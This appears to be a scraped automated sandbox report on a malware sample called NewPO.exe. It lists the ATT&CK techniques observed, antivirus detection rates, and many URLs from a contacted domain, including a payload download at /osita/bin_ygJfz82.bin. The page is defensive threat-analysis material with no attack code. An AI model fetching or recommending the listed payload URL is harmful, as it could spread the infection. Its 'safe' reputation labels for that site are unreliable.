    Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection2Virtualization/Sandbox Evasion22OS Credential DumpingSecurity Software Discovery411Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection2LSASS MemoryVirtualization/Sandbox Evasion22Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol113Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Information Discovery211Distributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    NewPO.exe30%VirustotalBrowse
    NewPO.exe11%ReversingLabsWin32.Worm.Wbvb

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    avicennamch.com0%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://avicennamch.com/amc-clinical-sciences-dermatology/0%Avira URL Cloudsafe
    https://avicennamch.com/wfme-standards/0%VirustotalBrowse
    https://avicennamch.com/wfme-standards/0%Avira URL Cloudsafe
    https://avicennamch.com/chairman-awt/0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=0%Avira URL Cloudsafe
    https://avicennamch.com/news-and-media/0%Avira URL Cloudsafe
    http://avicennamch.com/osita/bin_ygJfz82.binternet0%Avira URL Cloudsafe
    https://avicennamch.com/quality-standards/0%Avira URL Cloudsafe
    https://avicennamch.com/amh-ophthalmology/0%Avira URL Cloudsafe
    https://avicennamch.com/amh-obstetrics-and-gynecology/0%Avira URL Cloudsafe
    https://avicennamch.com/merit-list/0%Avira URL Cloudsafe
    https://avicennamch.com/adc-dental-materials/0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/jet-menu/assets/public/lib/font-awesome/css/v4-shims.min.0%Avira URL Cloudsafe
    https://avicennamch.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp0%Avira URL Cloudsafe
    https://avicennamch.com/avicenna-medical-hospital-medicine/0%Avira URL Cloudsafe
    http://x1.i.lencr.org0%Avira URL Cloudsafe
    https://avicennamch.com/category/main-news/0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/jet-menu/assets/public/lib/font-awesome/css/all.min.css?v0%Avira URL Cloudsafe
    https://avicennamch.com/director-adil-hospital/0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/addons-for-elementor-premium/assets/css/premium/lae-widge0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/v4-shims.min.css?ve0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/jet-menu/assets/public/js/jet-menu-widgets-scripts.js?ver0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/themes/twentytwenty/assets/js/index.js?ver=1.10%Avira URL Cloudsafe
    https://avicennamch.com/about-us/0%Avira URL Cloudsafe
    https://avicennamch.com/amh-paediatrics/0%Avira URL Cloudsafe
    https://avicennamch.com/adh-oral-pathology/0%Avira URL Cloudsafe
    https://avicennamch.com/category/uncategorized/0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/bdthemes-element-pack/assets/css/bdt-uikit.css?ver=3.20%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/addons-for-elementor-premium/assets/css/sliders.css?ver=20%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/elementskit-lite/libs/framework/assets/js/frontend-script0%Avira URL Cloudsafe
    https://avicennamch.com/2020/03/0%Avira URL Cloudsafe
    https://avicennamch.com/blank/0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?v0%Avira URL Cloudsafe
    http://cps.letsencrypt.org00%URL Reputationsafe
    http://cps.letsencrypt.org00%URL Reputationsafe
    http://cps.letsencrypt.org00%URL Reputationsafe
    https://avicennamch.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=2.9.70%Avira URL Cloudsafe
    https://avicennamch.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.10%Avira URL Cloudsafe
    https://avicennamch.com/avicenna-medical-hospital/0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/addons-for-elementor-premium/assets/css/icomoon.css?ver=20%Avira URL Cloudsafe
    https://avicennamch.com/adc-prosthodontics/0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/themes/twentytwenty/print.css?ver=1.10%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/elementskit-lite/widgets/init/assets/js/gmaps.min.js?ver=0%Avira URL Cloudsafe
    https://avicennamch.com/adc-oral-medicine/0%Avira URL Cloudsafe
    https://avicennamch.com/adh-dental-materials/0%Avira URL Cloudsafe
    https://avicennamch.com/in0%Avira URL Cloudsafe
    https://avicennamch.com/adc/0%Avira URL Cloudsafe
    https://avicennamch.com/admissions-criteria-for-foreign-students/0%Avira URL Cloudsafe
    https://avicennamch.com/amc-clinical-sciences-ent/0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/uploads/elementor/css/global.css?ver=16013742950%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.util0%Avira URL Cloudsafe
    https://avicennamch.com/careers-working/0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/addons-for-elementor-premium/assets/css/animate.css?ver=20%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=2.9.30%Avira URL Cloudsafe
    https://avicennamch.com/amc-basic-sciences-physiology/0%Avira URL Cloudsafe
    https://avicennamch.com/gnc/0%Avira URL Cloudsafe
    https://avicennamch.com/orthopedics/0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/jet-menu/assets/public/css/public.css?ver=2.0.0-beta0%Avira URL Cloudsafe
    https://avicennamch.com/amc-clinical-sciences-psychiatry-and-behavioral-sciences/0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.tran0%Avira URL Cloudsafe
    https://avicennamch.com/amh-ent/0%Avira URL Cloudsafe
    https://avicennamch.com/members-board-of-trustees/0%Avira URL Cloudsafe
    https://avicennamch.com/amc-clinical-sciences-orthopedics/0%Avira URL Cloudsafe
    https://avicennamch.com/amc/0%Avira URL Cloudsafe
    https://avicennamch.com/amc-clinical-sciences-medicine/0%Avira URL Cloudsafe
    http://avicennamch.com/osita/bin_ygJfz82.bin0%Avira URL Cloudsafe
    http://x1.c.lencr.org/00%Avira URL Cloudsafe
    http://x1.i.lencr.org/00%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/LayerSlider/assets/static/layerslider/css/layerslider.css0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/addons-for-elementor-premium/assets/css/lae-widgets.css?v0%Avira URL Cloudsafe
    https://avicennamch.com/amc-basic-sciences-biochemistry/0%Avira URL Cloudsafe
    https://avicennamch.com/avicenna-dental-hospital/0%Avira URL Cloudsafe
    https://avicennamch.com/2020/03/31/inauguration-of-avicenna-dental-college/0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/jet-elements/assets/css/jet-elements-skin.css?ver=2.2.120%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/addons-for-elementor-premium/assets/css/premium/sliders.c0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=2.90%Avira URL Cloudsafe
    https://avicennamch.com/adc-oral-surgery/0%Avira URL Cloudsafe
    https://avicennamch.com/admissions/0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/wp-smush-pro/app/assets/js/smush-lazy-load.min.js?ver=3.60%Avira URL Cloudsafe
    https://avicennamch.com/allied-health-sciences/0%Avira URL Cloudsafe
    https://avicennamch.com/admissions-mbbs/0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.60%Avira URL Cloudsafe
    http://avicennamch.com/osita/bin_ygJfz82.bin;]0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/elementskit-lite/widgets/init/assets/css/widget-styles.cs0%Avira URL Cloudsafe
    https://avicennamch.com/adh-periodontology/0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=1620%Avira URL Cloudsafe
    https://avicennamch.com/feed/0%Avira URL Cloudsafe
    http://x1.i.lencr.org/f0%Avira URL Cloudsafe
    https://avicennamch.com/sports-day/0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/elementskit-lite/widgets/init/assets/css/responsive.css?v0%Avira URL Cloudsafe
    https://avicennamch.com/adc-sports-day/0%Avira URL Cloudsafe
    https://avicennamch.com/adh-operative-dentistry/0%Avira URL Cloudsafe
    https://avicennamch.com/co-chairperson-development-and-coordination/0%Avira URL Cloudsafe
    https://avicennamch.com/covid-19/0%Avira URL Cloudsafe
    https://avicennamch.com/overview/0%Avira URL Cloudsafe
    https://avicennamch.com/wp-includes/wlwmanifest.xml0%Avira URL Cloudsafe
    https://avicennamch.com/wp-json/elementskit/v1/0%Avira URL Cloudsafe
    http://avicennamch.com/osita/bin_ygJfz82.bin#0%Avira URL Cloudsafe
    https://avicennamch.com/life-at-adc/0%Avira URL Cloudsafe
    https://avicennamch.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=2.9.70%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    avicennamch.com
    136.243.220.59
    truetrueunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://avicennamch.com/osita/bin_ygJfz82.bintrue
    • Avira URL Cloud: safe
    unknown
    http://avicennamch.com/osita/bin_ygJfz82.bin;]true
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://avicennamch.com/amc-clinical-sciences-dermatology/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/wfme-standards/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/chairman-awt/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/news-and-media/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://avicennamch.com/osita/bin_ygJfz82.binternetNewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/quality-standards/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/amh-ophthalmology/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/amh-obstetrics-and-gynecology/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/merit-list/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/adc-dental-materials/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/wp-content/plugins/jet-menu/assets/public/lib/font-awesome/css/v4-shims.min.NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wpNewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/avicenna-medical-hospital-medicine/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://x1.i.lencr.orgNewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/category/main-news/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/wp-content/plugins/jet-menu/assets/public/lib/font-awesome/css/all.min.css?vNewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/director-adil-hospital/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/wp-content/plugins/addons-for-elementor-premium/assets/css/premium/lae-widgeNewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/v4-shims.min.css?veNewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/wp-content/plugins/jet-menu/assets/public/js/jet-menu-widgets-scripts.js?verNewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/wp-content/themes/twentytwenty/assets/js/index.js?ver=1.1NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/about-us/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/amh-paediatrics/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/adh-oral-pathology/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/category/uncategorized/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/wp-content/plugins/bdthemes-element-pack/assets/css/bdt-uikit.css?ver=3.2NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/wp-content/plugins/addons-for-elementor-premium/assets/css/sliders.css?ver=2NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/wp-content/plugins/elementskit-lite/libs/framework/assets/js/frontend-scriptNewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/2020/03/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/blank/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?vNewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://cps.letsencrypt.org0NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    unknown
    https://avicennamch.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=2.9.7NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://avicennamch.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://schema.orgNewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
      high
      https://avicennamch.com/avicenna-medical-hospital/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://avicennamch.com/wp-content/plugins/addons-for-elementor-premium/assets/css/icomoon.css?ver=2NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://avicennamch.com/adc-prosthodontics/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://avicennamch.com/wp-content/themes/twentytwenty/print.css?ver=1.1NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://avicennamch.com/wp-content/plugins/elementskit-lite/widgets/init/assets/js/gmaps.min.js?ver=NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://avicennamch.com/adc-oral-medicine/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://avicennamch.com/adh-dental-materials/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://avicennamch.com/inNewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://avicennamch.com/adc/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://avicennamch.com/admissions-criteria-for-foreign-students/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://avicennamch.com/amc-clinical-sciences-ent/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://avicennamch.com/wp-content/uploads/elementor/css/global.css?ver=1601374295NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://avicennamch.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.utilNewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://avicennamch.com/careers-working/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://avicennamch.com/wp-content/plugins/addons-for-elementor-premium/assets/css/animate.css?ver=2NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://avicennamch.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=2.9.3NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://avicennamch.com/amc-basic-sciences-physiology/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      https://yoast.com/wordpress/plugins/seo/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
        high
        https://avicennamch.com/gnc/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/orthopedics/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/wp-content/plugins/jet-menu/assets/public/css/public.css?ver=2.0.0-betaNewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/amc-clinical-sciences-psychiatry-and-behavioral-sciences/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/wp-content/plugins/LayerSlider/assets/static/layerslider/js/layerslider.tranNewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/amh-ent/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/members-board-of-trustees/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/amc-clinical-sciences-orthopedics/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/amc/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/amc-clinical-sciences-medicine/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmp, NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://x1.c.lencr.org/0NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://x1.i.lencr.org/0NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/wp-content/plugins/LayerSlider/assets/static/layerslider/css/layerslider.cssNewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/wp-content/plugins/addons-for-elementor-premium/assets/css/lae-widgets.css?vNewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/amc-basic-sciences-biochemistry/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/avicenna-dental-hospital/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/2020/03/31/inauguration-of-avicenna-dental-college/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/wp-content/plugins/jet-elements/assets/css/jet-elements-skin.css?ver=2.2.12NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/wp-content/plugins/addons-for-elementor-premium/assets/css/premium/sliders.cNewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=2.9NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/adc-oral-surgery/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/admissions/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/wp-content/plugins/wp-smush-pro/app/assets/js/smush-lazy-load.min.js?ver=3.6NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/allied-health-sciences/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/admissions-mbbs/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/wp-content/plugins/elementskit-lite/widgets/init/assets/css/widget-styles.csNewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/adh-periodontology/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=162NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/feed/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://x1.i.lencr.org/fNewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/sports-day/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/wp-content/plugins/elementskit-lite/widgets/init/assets/css/responsive.css?vNewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/adc-sports-day/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/adh-operative-dentistry/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/co-chairperson-development-and-coordination/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/covid-19/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/overview/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/wp-includes/wlwmanifest.xmlNewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/wp-json/elementskit/v1/NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://avicennamch.com/osita/bin_ygJfz82.bin#NewPO.exe, 0000000F.00000002.1162410140.00000000008E9000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://avicennamch.com/life-at-adc/NewPO.exe, 0000000F.00000002.1162622019.0000000002450000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        unknown
